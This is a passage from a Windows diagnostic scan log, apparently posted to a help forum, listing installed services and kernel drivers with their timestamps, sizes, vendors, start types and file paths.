SRV - [2017/09/29 14:42:23 | 000,403,456 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\mprdim.dll -- (RemoteAccess)
SRV - [2017/09/29 14:42:23 | 000,236,544 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\qwave.dll -- (QWAVE)
SRV - [2017/09/29 14:42:22 | 000,136,192 | ---- | M] (Microsoft Corporation) [On_Demand | Unknown] -- C:\Windows\SysWOW64\PrintWorkflowService.dll -- (PrintWorkflowUserSvc)
SRV - [2017/09/29 14:42:19 | 001,537,024 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\pla.dll -- (pla)
SRV - [2017/09/29 14:42:18 | 002,385,920 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\WsmSvc.dll -- (WinRM)
SRV - [2017/09/29 14:42:18 | 000,059,904 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\WINDOWS\SysWow64\msiexec.exe -- (msiserver)
SRV - [2017/09/29 14:42:16 | 000,332,288 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV - [2017/09/29 14:42:16 | 000,029,696 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV - [2017/09/29 14:42:14 | 000,565,248 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
SRV - [2017/09/29 14:42:14 | 000,089,088 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\wdi.dll -- (WdiSystemHost)
SRV - [2017/09/29 14:42:14 | 000,089,088 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\wdi.dll -- (WdiServiceHost)
SRV - [2017/09/29 14:42:14 | 000,019,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWow64\dllhost.exe -- (COMSysApp)
SRV - [2017/09/29 14:42:11 | 000,516,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Windows.Internal.Management.dll -- (DmEnrollmentSvc)
SRV - [2017/09/29 14:42:08 | 000,335,872 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\upnphost.dll -- (upnphost)
SRV - [2017/09/29 14:42:08 | 000,020,992 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2017/09/29 14:41:23 | 000,396,288 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\provsvc.dll -- (HomeGroupProvider)
SRV - [2017/09/29 09:45:12 | 000,127,488 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\servicing\TrustedInstaller.exe -- (TrustedInstaller)
SRV - [2017/09/28 15:50:00 | 000,043,648 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe -- (FontCache3.0.0.0)
SRV - [2017/09/20 02:42:50 | 000,817,760 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe -- (AdobeUpdateService)
SRV - [2017/05/05 10:47:52 | 000,111,328 | ---- | M] (Wondershare) [On_Demand | Stopped] -- C:\Program Files (x86)\Wondershare\MirrorGo\DriverInstall.exe -- (WsDrvInst)
SRV - [2017/03/28 19:42:23 | 000,107,832 | ---- | M] () [Auto | Running] -- C:\Windows\SysWOW64\PnkBstrB.exe -- (PnkBstrB)
SRV - [2017/03/01 09:30:54 | 000,474,768 | ---- | M] (Wondershare) [Auto | Stopped] -- C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppService.exe -- (WsAppService)
SRV - [2016/11/06 12:42:00 | 007,986,816 | ---- | M] (INCA Internet Co., Ltd.) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GameMon.des -- (npggsvc)
SRV - [2016/08/10 17:16:02 | 004,089,680 | ---- | M] (Matrox Graphics Inc) [On_Demand | Stopped] -- C:\Program Files (x86)\Matrox Graphics\PowerDesk\Matrox.PDesk.Services.exe -- (Matrox.Pdesk3.ServicesHost)
SRV - [2016/07/17 19:54:21 | 000,076,888 | ---- | M] () [Auto | Running] -- C:\Windows\SysWOW64\PnkBstrA.exe -- (PnkBstrA)
SRV - [2015/11/20 04:47:22 | 000,021,184 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe -- (IpOverUsbSvc)
SRV - [2015/11/19 21:10:52 | 000,137,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe -- (Te.Service)
SRV - [2014/12/12 17:24:50 | 000,044,760 | ---- | M] () [Auto | Running] -- C:\Windows\runSW.exe -- (RunSwUSB)
SRV - [2014/04/23 19:32:02 | 000,262,360 | ---- | M] (Realtek) [Auto | Stopped] -- C:\Program Files (x86)\REALTEK\USB Wireless LAN Utility\RTLDHCP.exe -- (RTLDHCPService)
SRV - [2014/04/03 01:08:03 | 000,381,952 | ---- | M] (Scarlet.Crush Productions) [Auto | Stopped] -- B:\ScpServer\bin\ScpService.exe -- (Ds3Service)
SRV - [2012/07/30 08:42:50 | 000,258,048 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\On Networks\N150MA\WPSService.exe -- (WPSService)
SRV - [2011/06/30 21:23:46 | 000,167,936 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\On Networks\N150MA\WlanWpsSvc.exe -- (WlanWpsSvc)
SRV - [2006/11/10 07:12:28 | 000,099,936 | ---- | M] () [Disabled | Running] -- C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe -- (IJPLMSVC)


[color=#E56717]========== Driver Services (All) ==========[/color]

DRV:[b]64bit:[/b] - [2018/12/29 18:05:58 | 000,907,160 | ---- | M] () [Kernel | System | Running] -- C:\Windows\SysNative\drivers\NetUtils2016.sys -- (NetUtils2016)
DRV:[b]64bit:[/b] - [2018/12/23 13:27:24 | 000,156,008 | ---- | M] () [Kernel | System | Running] -- C:\Windows\SysNative\drivers\YzY2ZjJjNDBlYTIxM -- (YzY2ZjJjNDBlYTIxM)
DRV:[b]64bit:[/b] - [2018/06/02 15:11:11 | 000,041,192 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vbaudio_vmvaio64_win7.sys -- (VBAudioVMVAIOMME)
DRV:[b]64bit:[/b] - [2018/05/11 17:17:10 | 006,161,344 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\RTKVHD64.sys -- (IntcAzAudAddService)
DRV:[b]64bit:[/b] - [2018/05/11 17:15:50 | 007,978,296 | ---- | M] (Realtek Semiconductor Corporation ) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rtwlanu.sys -- (RtlWlanu)
DRV:[b]64bit:[/b] - [2018/04/26 13:06:58 | 000,035,560 | ---- | M] (Apple Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\AppleLowerFilter.sys -- (AppleLowerFilter)
DRV:[b]64bit:[/b] - [2018/03/30 06:12:57 | 000,075,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:[b]64bit:[/b] - [2018/03/30 06:06:25 | 000,166,304 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\partmgr.sys -- (partmgr)
DRV:[b]64bit:[/b] - [2018/03/30 06:06:23 | 000,053,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pcw.sys -- (pcw)
DRV:[b]64bit:[/b] - [2018/03/30 06:05:22 | 000,073,120 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hvservice.sys -- (hvservice)
DRV:[b]64bit:[/b] - [2018/03/30 06:03:57 | 000,059,808 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\bam.sys -- (bam)
DRV:[b]64bit:[/b] - [2018/03/30 06:03:41 | 001,277,856 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\ndis.sys -- (NDIS)
DRV:[b]64bit:[/b] - [2018/03/30 06:03:21 | 000,139,680 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\ksecdd.sys -- (KSecDD)
DRV:[b]64bit:[/b] - [2018/03/30 06:01:29 | 000,571,288 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:[b]64bit:[/b] - [2018/03/30 06:01:02 | 000,034,208 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2018/03/30 06:00:30 | 000,094,104 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\disk.sys -- (Disk)
DRV:[b]64bit:[/b] - [2018/03/30 06:00:27 | 002,395,040 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Running] -- C:\WINDOWS\SysNative\drivers\ntfs.sys -- (NTFS)
DRV:[b]64bit:[/b] - [2018/03/30 06:00:10 | 000,103,320 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mountmgr.sys -- (mountmgr)
DRV:[b]64bit:[/b] - [2018/03/30 05:59:13 | 000,082,840 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\volmgr.sys -- (volmgr)
DRV:[b]64bit:[/b] - [2018/03/30 05:59:12 | 000,398,744 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\fltMgr.sys -- (FltMgr)
DRV:[b]64bit:[/b] - [2018/03/30 05:58:42 | 000,039,328 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\storvsc.sys -- (storvsc)
DRV:[b]64bit:[/b] - [2018/03/30 05:57:54 | 000,121,248 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\tdx.sys -- (tdx)
DRV:[b]64bit:[/b] - [2018/03/30 05:57:44 | 000,109,976 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\vmbus.sys -- (vmbus)
DRV:[b]64bit:[/b] - [2018/03/30 05:55:43 | 000,062,880 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fsdepends.sys -- (FsDepends)
DRV:[b]64bit:[/b] - [2018/03/30 05:54:22 | 002,574,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\dxgkrnl.sys -- (DXGKrnl)
DRV:[b]64bit:[/b] - [2018/03/30 05:53:06 | 000,712,600 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vhdmp.sys -- (vhdmp)
DRV:[b]64bit:[/b] - [2018/03/30 05:53:04 | 000,163,744 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:[b]64bit:[/b] - [2018/03/30 05:52:37 | 000,677,280 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\cng.sys -- (CNG)
DRV:[b]64bit:[/b] - [2018/03/30 05:52:29 | 000,054,688 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\vdrvroot.sys -- (vdrvroot)
DRV:[b]64bit:[/b] - [2018/03/30 05:52:24 | 000,192,416 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\appid.sys -- (AppID)
DRV:[b]64bit:[/b] - [2018/03/30 05:52:14 | 000,047,512 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\vmstorfl.sys -- (storflt)
DRV:[b]64bit:[/b] - [2018/03/30 05:52:05 | 000,727,456 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\fvevol.sys -- (fvevol)
DRV:[b]64bit:[/b] - [2018/03/30 05:52:04 | 000,282,528 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\rdyboost.sys -- (rdyboost)
DRV:[b]64bit:[/b] - [2018/03/30 05:52:01 | 000,428,960 | ---- | M] (Microsoft Corporation) [File_System | System | Running] -- C:\Windows\SysNative\drivers\rdbss.sys -- (rdbss)
DRV:[b]64bit:[/b] - [2018/03/30 05:51:59 | 000,123,800 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\mup.sys -- (Mup)
DRV:[b]64bit:[/b] - [2018/03/30 05:51:43 | 000,071,208 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\WindowsTrustedRT.sys -- (WindowsTrustedRT)
DRV:[b]64bit:[/b] - [2018/03/30 05:51:27 | 000,147,872 | ---- | M] (Microsoft Corporation) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\wcifs.sys -- (wcifs)
DRV:[b]64bit:[/b] - [2018/03/30 05:50:40 | 000,057,760 | ---- | M] (Microsoft Corporation) [File_System | System | Running] -- C:\Windows\SysNative\drivers\netbios.sys -- (NetBIOS)
DRV:[b]64bit:[/b] - [2018/03/30 05:48:44 | 001,101,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\http.sys -- (HTTP)
DRV:[b]64bit:[/b] - [2018/03/30 05:48:43 | 000,614,304 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\afd.sys -- (AFD)
DRV:[b]64bit:[/b] - [2018/03/30 04:33:56 | 000,025,088 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VMBusHID.sys -- (VMBusHID)
DRV:[b]64bit:[/b] - [2018/03/30 04:33:55 | 000,009,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vms3cap.sys -- (s3cap)
DRV:[b]64bit:[/b] - [2018/03/30 04:33:54 | 000,013,312 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:[b]64bit:[/b] - [2018/03/30 04:33:54 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgid.sys -- (vmgid)
DRV:[b]64bit:[/b] - [2018/03/30 04:33:52 | 000,028,160 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:[b]64bit:[/b] - [2018/03/30 04:33:52 | 000,017,920 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rasacd.sys -- (RasAcd)
DRV:[b]64bit:[/b] - [2018/03/30 04:33:51 | 000,016,896 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:[b]64bit:[/b] - [2018/03/30 04:33:32 | 000,119,808 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\irda.sys -- (irda)
DRV:[b]64bit:[/b] - [2018/03/30 04:33:31 | 000,080,896 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wanarp.sys -- (wanarpv6)
DRV:[b]64bit:[/b] - [2018/03/30 04:33:31 | 000,080,896 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\wanarp.sys -- (wanarp)
DRV:[b]64bit:[/b] - [2018/03/30 04:33:09 | 000,079,872 | ---- | M] (Microsoft Corporation) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\storqosflt.sys -- (storqosflt)
DRV:[b]64bit:[/b] - [2018/03/30 04:33:04 | 000,046,592 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:[b]64bit:[/b] - [2018/03/30 04:32:56 | 000,064,512 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Synth3dVsc.sys -- (Synth3dVsc)
DRV:[b]64bit:[/b] - [2018/03/30 04:32:55 | 000,075,264 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wcnfs.sys -- (wcnfs)
DRV:[b]64bit:[/b] - [2018/03/30 04:32:53 | 000,065,024 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ndisuio.sys -- (Ndisuio)
DRV:[b]64bit:[/b] - [2018/03/30 04:32:53 | 000,008,192 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\gpuenergydrv.sys -- (GpuEnergyDrv)
DRV:[b]64bit:[/b] - [2018/03/30 04:32:48 | 000,192,512 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc.sys -- (netvsc)
DRV:[b]64bit:[/b] - [2018/03/30 04:32:47 | 000,065,024 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\lltdio.sys -- (lltdio)
DRV:[b]64bit:[/b] - [2018/03/30 04:32:40 | 000,225,792 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\winnat.sys -- (WinNat)
DRV:[b]64bit:[/b] - [2018/03/30 04:32:37 | 000,149,504 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\rmcast.sys -- (RMCAST)
DRV:[b]64bit:[/b] - [2018/03/30 04:32:21 | 000,044,544 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\nsiproxy.sys -- (nsiproxy)
DRV:[b]64bit:[/b] - [2018/03/30 04:31:41 | 000,151,040 | ---- | M] (Microsoft Corporation) [File_System | System | Running] -- C:\Windows\SysNative\drivers\dfsc.sys -- (Dfsc)
DRV:[b]64bit:[/b] - [2018/03/30 04:31:24 | 000,316,928 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\netbt.sys -- (NetBT)
DRV:[b]64bit:[/b] - [2018/03/30 04:29:10 | 000,723,968 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\PEAuth.sys -- (PEAUTH)
DRV:[b]64bit:[/b] - [2018/03/30 04:23:28 | 000,424,448 | ---- | M] (Microsoft Corporation) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\srv.sys -- (srv)
DRV:[b]64bit:[/b] - [2018/03/30 04:23:26 | 000,726,016 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\srv2.sys -- (srv2)
DRV:[b]64bit:[/b] - [2018/03/30 04:23:01 | 000,182,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpdr.sys -- (RDPDR)
DRV:[b]64bit:[/b] - [2018/03/30 04:22:45 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\rdpbus.sys -- (rdpbus)
DRV:[b]64bit:[/b] - [2018/03/30 04:22:12 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\WINDOWS\SysNative\drivers\beep.sys -- (Beep)
DRV:[b]64bit:[/b] - [2018/03/30 04:20:46 | 000,101,888 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\bowser.sys -- (bowser)
DRV:[b]64bit:[/b] - [2018/03/30 04:20:45 | 000,199,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\intelppm.sys -- (intelppm)
DRV:[b]64bit:[/b] - [2018/03/30 04:20:44 | 000,180,736 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdk8.sys -- (AmdK8)
DRV:[b]64bit:[/b] - [2018/03/30 04:20:43 | 000,178,688 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdppm.sys -- (AmdPPM)
DRV:[b]64bit:[/b] - [2018/03/30 04:20:42 | 000,177,664 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\processr.sys -- (Processor)
DRV:[b]64bit:[/b] - [2018/03/30 04:20:39 | 000,240,640 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:[b]64bit:[/b] - [2018/03/30 04:20:36 | 000,073,216 | ---- | M] (Microsoft Corporation) [File_System | System | Running] -- C:\WINDOWS\SysNative\drivers\npfs.sys -- (Npfs)
DRV:[b]64bit:[/b] - [2018/03/30 04:20:36 | 000,031,232 | ---- | M] (Microsoft Corporation) [File_System | System | Running] -- C:\WINDOWS\SysNative\drivers\msfs.sys -- (Msfs)
DRV:[b]64bit:[/b] - [2018/03/30 04:20:35 | 000,007,168 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\WINDOWS\SysNative\drivers\null.sys -- (Null)
DRV:[b]64bit:[/b] - [2018/03/13 08:03:45 | 000,279,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msiscsi.sys -- (iScsiPrt)
DRV:[b]64bit:[/b] - [2018/03/13 07:58:53 | 000,170,904 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\ksecpkg.sys -- (KSecPkg)
DRV:[b]64bit:[/b] - [2018/03/13 07:58:16 | 000,377,760 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\msrpc.sys -- (MsRPC)
DRV:[b]64bit:[/b] - [2018/03/13 07:54:16 | 000,555,936 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:[b]64bit:[/b] - [2018/03/13 07:51:14 | 002,773,408 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tcpip.sys -- (Tcpip6)
DRV:[b]64bit:[/b] - [2018/03/13 07:51:14 | 002,773,408 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\tcpip.sys -- (Tcpip)
DRV:[b]64bit:[/b] - [2018/03/13 06:38:31 | 000,071,680 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbser.sys -- (usbser)
DRV:[b]64bit:[/b] - [2018/03/01 08:29:31 | 000,733,592 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpi.sys -- (ACPI)
DRV:[b]64bit:[/b] - [2018/03/01 08:10:27 | 000,022,936 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\isapnp.sys -- (isapnp)
DRV:[b]64bit:[/b] - [2018/03/01 06:51:55 | 000,034,816 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:[b]64bit:[/b] - [2018/03/01 06:49:09 | 000,529,408 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nwifi.sys -- (NativeWifiP)
DRV:[b]64bit:[/b] - [2018/03/01 06:46:03 | 000,770,048 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdiWiFi.sys -- (wdiwifi)
DRV:[b]64bit:[/b] - [2018/02/22 03:10:34 | 000,285,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:[b]64bit:[/b] - [2018/02/22 03:02:49 | 000,149,400 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:[b]64bit:[/b] - [2018/02/22 02:54:20 | 000,437,144 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:[b]64bit:[/b] - [2018/02/22 02:52:26 | 000,103,328 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:[b]64bit:[/b] - [2018/02/22 02:51:38 | 000,045,472 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\storufs.sys -- (storufs)
DRV:[b]64bit:[/b] - [2018/02/22 02:51:00 | 000,097,176 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:[b]64bit:[/b] - [2018/02/22 02:50:42 | 000,229,272 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:[b]64bit:[/b] - [2018/02/22 02:50:34 | 000,362,904 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pci.sys -- (pci)
DRV:[b]64bit:[/b] - [2018/02/22 01:31:14 | 000,057,344 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\UcmUcsi.sys -- (UcmUcsi)
DRV:[b]64bit:[/b] - [2018/02/22 01:26:59 | 000,441,344 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HdAudio.sys -- (HdAudAddService)
DRV:[b]64bit:[/b] - [2018/02/10 07:13:19 | 000,373,656 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:[b]64bit:[/b] - [2018/02/10 07:06:33 | 000,494,488 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mrxsmb.sys -- (mrxsmb)
DRV:[b]64bit:[/b] - [2018/02/10 05:49:33 | 000,385,536 | ---- | M] (Microsoft Corporation) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\cldflt.sys -- (CldFlt)
DRV:[b]64bit:[/b] - [2018/02/10 05:48:00 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mskssrv.sys -- (MSKSSRV)
DRV:[b]64bit:[/b] - [2018/01/19 21:32:08 | 000,053,128 | ---- | M] (Benjamin Höglinger-Stelzer) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ViGEmBus.sys -- (ViGEmBus)
DRV:[b]64bit:[/b] - [2018/01/01 12:21:53 | 000,062,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ndproxy.sys -- (ndproxy)
DRV:[b]64bit:[/b] - [2018/01/01 12:21:49 | 000,097,280 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\raspptp.sys -- (PptpMiniport)
DRV:[b]64bit:[/b] - [2017/12/14 02:39:21 | 000,401,304 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\volsnap.sys -- (volsnap)
DRV:[b]64bit:[/b] - [2017/12/14 02:39:21 | 000,259,072 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\srvnet.sys -- (srvnet)
DRV:[b]64bit:[/b] - [2017/12/14 02:39:21 | 000,230,296 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mrxsmb20.sys -- (mrxsmb20)
DRV:[b]64bit:[/b] - [2017/12/14 02:39:21 | 000,124,928 | ---- | M] (Microsoft Corporation) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\luafv.sys -- (luafv)
